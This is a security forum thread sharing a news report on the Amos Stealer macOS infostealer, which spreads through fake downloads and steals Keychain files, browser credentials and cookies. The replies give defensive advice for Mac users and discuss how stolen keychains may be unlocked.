Malware News Amos Stealer Targets macOS Keychain Files and Browser Passwords

Brownie2019

Brownie2019

Level 23
Thread author
Verified
Well-known
Forum Veteran
Mar 9, 2019
1,035
5,296
2,168
Germany
Content source
https://hackread.com/amos-stealer-macos-keychain-files-browser-passwords/
Amos Stealer targets macOS users through fake downloads, stealing Keychain files, browser passwords, cookies, and developer configs for data theft.
Amos Stealer, an information-stealing malware, is targeting Apple Mac computers to steal private data, according to new details from cybersecurity research firm CyberProof. Threat actors are, reportedly, actively using this malware family to run financially motivated campaigns by compromising macOS environments.

Although Amos Stealer is not new, in the latest campaign, the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures.

Once inside a Mac, it searches for valuable files across system directories. It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers.

Silent Download Methods
Click to expand...
Read more:
hackread.com

Amos Stealer Targets macOS Keychain Files and Browser Passwords

Amos Stealer targets macOS users through fake downloads, stealing Keychain files, browser passwords, cookies, and developer configs for data theft.
hackread.com hackread.com
 
  • Like
  • Wow
Reactions: Halp2001, Khushal, lokamoka820 and 2 others
Brownie2019 said:
Read more:
hackread.com

Amos Stealer Targets macOS Keychain Files and Browser Passwords

Amos Stealer targets macOS users through fake downloads, stealing Keychain files, browser passwords, cookies, and developer configs for data theft.
hackread.com hackread.com
Click to expand...
This kind of macOS “fake download” distribution is a common way infostealers get in, and the impact can be serious because saved browser sessions/cookies can let attackers access accounts even without the password.

What this means in practice
  • Stealing Keychain data, browser passwords, and cookies can lead to account takeover, not just “data theft.”
  • Developer-related files/configs (when targeted) can be used for follow-on compromise (for example, accessing code repos, signing keys, CI/CD tokens, or cloud credentials) depending on what’s present on the Mac.
  • Fake installers and lookalike websites are often the initial entry point, so prevention is heavily about download hygiene and macOS protections.

Low-risk defenses that help most macOS users
  • Install software only from the Mac App Store or the vendor’s official site (avoid “cracked,” “repacked,” and download-portal installers).
  • Keep macOS and browsers fully updated (many campaigns rely on users running older builds).
  • Leave Gatekeeper on, and be cautious with “Open Anyway” overrides for unsigned/unnotarized apps.
  • Use a password manager and enable 2FA/FIDO2 security keys where possible; don’t rely on browser-saved passwords for important accounts.
  • Review and remove unknown browser extensions (Chrome/Edge), especially ones installed “recently” or without a clear publisher.

If you suspect you ran a fake installer (safe next steps)
  • Disconnect from the network (reduces further exfiltration) and stop using the device for sensitive logins until checks are done.
  • Run a scan with a reputable macOS security product (well-known options include Malwarebytes for Mac, Bitdefender, ESET, or similar). No scanner is perfect, but it’s a good first pass.
  • Change passwords from a known-clean device, starting with email, Apple ID, password manager, and financial accounts; revoke active sessions/tokens where the service supports it.
  • Rotate any developer/API credentials that might have been stored locally (GitHub/GitLab tokens, SSH keys, cloud access keys, etc.).
  • Check macOS persistence points (remove only what you’re confident is unwanted): Login Items, LaunchAgents/LaunchDaemons, Profiles/MDM configuration profiles, and unusual background items.

Sharing IOCs safely
If the thread is collecting indicators (filenames, hashes, domains), the safest approach is to upload the suspicious installer/sample to VirusTotal and share the link/results, rather than relying on a single AV alert or assumptions about “safe vs malicious.”

Sources

  • [][/URL='https://support.apple.com/guide/mac-help/open-a-mac-app-from-an-unidentified-developer-mh40616/mac']Apple: Open a Mac app from an unidentified developer (Gatekeeper)[/URL]
    [][/URL='https://support.apple.com/guide/security/protecting-against-malware-sec469d47bd8/web']Apple Platform Security: Protecting against malware (XProtect/MRT concepts)[/URL]
    [][/URL]https://hackread.com/amos-stealer-macos-keychain-files-browser-passwords/[/URL]
 
Here's the original report from CyberProof:

www.cyberproof.com

Inside Amos Stealer: How This Threat Targets macOS Credentials and Keychains

Introduction Amos Stealer remains a prominent and highly active malware family specifically engineered to target macOS users and extract sensitive
www.cyberproof.com www.cyberproof.com

What I don't get is: the infostealer steals the encrypted keychain database file — but how do they decrypt it? There's no mention of a keylogger, and no mention of a memory dump.

It turns out the different campaigns steal passwords via different mechanisms — including realistic dialog prompts and command-line "validation."
 
Last edited:
  • Like
Reactions: Brownie2019, Halp2001, Khushal and 2 others

You may also like...